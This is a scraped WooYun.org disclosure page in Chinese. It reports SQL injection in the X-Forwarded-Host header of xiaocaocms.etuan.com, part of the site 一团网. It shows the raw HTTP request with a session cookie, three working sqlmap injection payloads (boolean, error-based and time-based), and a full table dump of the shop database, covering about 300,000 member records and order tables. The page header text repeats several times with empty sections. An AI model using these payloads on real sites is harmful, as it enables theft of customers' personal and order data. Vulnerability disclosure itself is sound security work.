一团网某站存在SQL注入(涉及近30W用户) | wooyun-2015-0148054| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148054

漏洞标题：一团网某站存在SQL注入(涉及近30W用户)

漏洞作者：深度安全实验室

提交时间：2015-10-20 16:18

修复时间：2015-10-25 16:20

公开时间：2015-10-25 16:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-20：细节已通知厂商并且等待厂商处理中
2015-10-25：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-Host: *
Cookie: PHPSESSID=c7479b62fd4ccbc6270dce14b8ceb80e; 28BB_goodsnum=0; Hm_lvt_09d2747522ea08ffa2a908736b5dc25f=1445321841,1445321943; Hm_lpvt_09d2747522ea08ffa2a908736b5dc25f=1445321943; _ga=GA1.2.1778601477.1445321842; _gat=1; HMVT=09d2747522ea08ffa2a908736b5dc25f|1445321852|; HMACCOUNT=7C4ADD99F4AFA2FB
Host: xiaocaocms.etuan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: X-Forwarded-Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: -1777' OR 7580=7580#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: -1721' OR 1 GROUP BY CONCAT(0x716b627871,(SELECT (CASE WHEN (9395=9395) THEN 1 ELSE 0 END)),0x71787a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))SWfW)#
---
back-end DBMS: MySQL 5.0.12
Database: etuan_shopnc_db
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| shopnc_message              | 310948  |
| shopnc_member               | 299818  |     //用户
| shopnc_flowstat_1           | 268265  |
| shopnc_sns_visitor          | 253128  |
| shopnc_flowstat_3           | 244678  |
| shopnc_flowstat_5           | 239343  |
| shopnc_points_log           | 232545  |
| shopnc_flowstat_4           | 223993  |
| shopnc_flowstat_2           | 218631  |
| shopnc_evaluate_goods       | 193609  |
| shopnc_order_log            | 182730  |
| shopnc_bili_log             | 151305  |
| shopnc_voucher              | 123408  |
| shopnc_order_goods          | 113031  |
| shopnc_order                | 112378  |       ///订单
| shopnc_voucher_password     | 109707  |
| shopnc_ips                  | 66905   |
| shopnc_predeposit_log       | 57816   |
| shopnc_predeposit_log_2     | 53099   |
| shopnc_order_address        | 50717   |
| shopnc_evaluate_store       | 41325   |
| shopnc_salenum              | 25360   |
| shopnc_goods_param          | 20607   |
| shopnc_sms_log              | 20556   |
| shopnc_address              | 20132   |
| shopnc_goods_attr_index     | 10308   |
| shopnc_kami                 | 7920    |
| shopnc_album_pic            | 7533    |
| shopnc_goods_spec           | 7194    |
| shopnc_weixin_user          | 6151    |
| shopnc_cart                 | 5054    |
| shopnc_goods_spec_index     | 4933    |
| shopnc_goods                | 4546    |
| shopnc_refund_log           | 3549    |
| shopnc_evaluate_goodsstat   | 2870    |
| shopnc_bill                 | 2748    |
| shopnc_predeposit_cash      | 2549    |
| shopnc_adv_click            | 2423    |
| shopnc_fychoujiang          | 2077    |
| shopnc_predeposit_recharge  | 1845    |
| shopnc_favorites            | 1824    |
| shopnc_zhuanpan             | 1520    |
| shopnc_goods_class_staple   | 1362    |
| shopnc_gold_log             | 1311    |
| shopnc_store_class_goods    | 1305    |
| shopnc_goods_group          | 1232    |
| shopnc_groupbuy_template    | 1220    |
| shopnc_evaluate_storestat   | 1185    |
| shopnc_consult              | 987     |
| shopnc_p_xianshi_goods      | 931     |
| shopnc_album_class          | 910     |
| shopnc_mb_user_token        | 897     |
| shopnc_sns_albumclass       | 885     |
| shopnc_store_extend         | 836     |
| shopnc_store                | 831     |
| shopnc_complain_goods       | 634     |
| shopnc_store_goods_class    | 614     |
| shopnc_complain             | 597     |
| shopnc_zadan                | 492     |
| shopnc_sns_friend           | 489     |
| shopnc_sns_albumpic         | 446     |
| shopnc_sns_tracelog         | 406     |
| shopnc_adv                  | 360     |
| shopnc_shiming              | 339     |
| shopnc_fenxiao_to           | 304     |
| shopnc_article              | 282     |
| shopnc_attribute_value      | 272     |
| shopnc_p_xianshi            | 269     |
| shopnc_sns_s_tracelog       | 242     |
| shopnc_sns_sharegoods       | 231     |
| shopnc_voucher_template     | 225     |
| shopnc_adv_position         | 191     |
| shopnc_sns_goods            | 181     |
| shopnc_gold_buy             | 179     |
| shopnc_voucher_quota        | 179     |
| shopnc_p_xianshi_quota      | 164     |
| shopnc_tuijian              | 147     |
| shopnc_p_xianshi_apply      | 141     |
| shopnc_goodsyuding          | 131     |
| shopnc_setting              | 130     |
| shopnc_voucher_apply        | 122     |
| shopnc_goods_class          | 115     |
| shopnc_return_goods         | 113     |
| shopnc_return               | 112     |
| shopnc_store_class          | 92      |
| shopnc_recommend_goods      | 88      |
| shopnc_cards                | 78      |
| shopnc_goods_class_tag      | 77      |
| shopnc_store_watermark      | 72      |
| shopnc_activity_detail      | 58      |
| shopnc_web_code             | 56      |
| shopnc_map                  | 54      |
| shopnc_daddress             | 52      |
| shopnc_link                 | 51      |
| shopnc_spec_value           | 48      |
| shopnc_express              | 47      |
| shopnc_brand                | 44      |
| shopnc_attribute            | 28      |
| shopnc_voucher_price        | 28      |
| shopnc_complain_talk        | 27      |
| shopnc_p_mansong_rule       | 27      |
| shopnc_pd_log               | 26      |
| shopnc_mail_msg_temlates    | 24      |
| shopnc_p_mansong            | 24      |
| shopnc_sns_mtagmember       | 24      |
| shopnc_points_order         | 23      |
| shopnc_points_orderaddress  | 23      |
| shopnc_points_ordergoods    | 23      |
| shopnc_points_cart          | 22      |
| shopnc_store_gradelog       | 20      |
| shopnc_admin                | 17      |
| shopnc_huida                | 17      |
| shopnc_upload               | 17      |
| shopnc_rec_position         | 16      |
| shopnc_sns_setting          | 16      |
| shopnc_jiangpin             | 14      |
| shopnc_seo                  | 14      |
| shopnc_coupon               | 13      |
| shopnc_p_mansong_apply      | 13      |
| shopnc_p_mansong_quota      | 13      |
| shopnc_points_goods         | 13      |
| shopnc_recommend            | 13      |
| shopnc_payment              | 11      |
| shopnc_type                 | 11      |
| shopnc_type_spec            | 11      |
| shopnc_article_class        | 9       |
| shopnc_web                  | 8       |
| shopnc_mb_home              | 7       |
| shopnc_spec                 | 7       |
| shopnc_fenxiaotxlog         | 6       |
| shopnc_gold_payment         | 6       |
| shopnc_document             | 5       |
| shopnc_groupbuy_class       | 5       |
| shopnc_groupbuy_price_range | 5       |
| shopnc_complain_subject     | 4       |
| shopnc_inform_subject       | 4       |
| shopnc_mb_ad                | 4       |
| shopnc_store_grade          | 4       |
| shopnc_wenti                | 4       |
| shopnc_navigation           | 3       |
| shopnc_sns_s_autosetting    | 3       |
| shopnc_common_cron          | 2       |
| shopnc_inform               | 2       |
| shopnc_p_bundling_quota     | 2       |
| shopnc_pages                | 2       |
| shopnc_sns_comment          | 2       |
| shopnc_sns_sharestore       | 2       |
| shopnc_transport_extend     | 2       |
| shopnc_activity             | 1       |
| shopnc_coupon_class         | 1       |
| shopnc_groupbuy_area        | 1       |
| shopnc_inform_subject_type  | 1       |
| shopnc_sns_membertag        | 1       |
| shopnc_transport            | 1       |
+-----------------------------+---------+

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-25 16:20

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148054

漏洞标题：一团网某站存在SQL注入(涉及近30W用户)

相关厂商：一团网

漏洞作者：深度安全实验室

提交时间：2015-10-20 16:18

修复时间：2015-10-25 16:20

公开时间：2015-10-25 16:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148054

漏洞标题：一团网某站存在SQL注入(涉及近30W用户)

相关厂商：一团网

漏洞作者： 深度安全实验室

提交时间：2015-10-20 16:18

修复时间：2015-10-25 16:20

公开时间：2015-10-25 16:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0148054"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：深度安全实验室

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源深度安全实验室@乌云